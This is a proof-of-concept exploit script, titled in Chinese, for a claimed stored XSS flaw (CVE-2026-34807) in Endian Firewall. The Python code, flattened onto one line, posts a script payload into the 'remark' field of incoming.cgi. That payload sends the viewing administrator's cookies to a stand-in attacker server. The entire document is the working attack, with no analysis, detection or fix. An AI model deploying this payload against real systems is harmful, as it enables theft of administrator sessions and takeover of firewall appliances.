CVE-2026-34807: Endian Firewall 存储型XSS漏洞

#!/usr/bin/env python3 # PoC for CVE-2026-34807 import requests def exploit(target, session_cookie): url = f"{target}/cgi-bin/incoming.cgi" # The payload injects a script to steal cookies payload = '<script>fetch("http://attacker-server/?c="+document.cookie)</script>' headers = { "Cookie": f"sid={session_cookie}" } data = { "remark": payload, "source": "192.168.1.100", "destination": "192.168.1.200" } try: r = requests.post(url, data=data, headers=headers, timeout=10) if r.status_code == 200: print("[+] Payload sent successfully. XSS triggered when admin views the remark.") else: print(f"[-] Failed to send payload. Status code: {r.status_code}") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": target = "http://<target-ip>" session_cookie = "<valid_session_id>" exploit(target, session_cookie)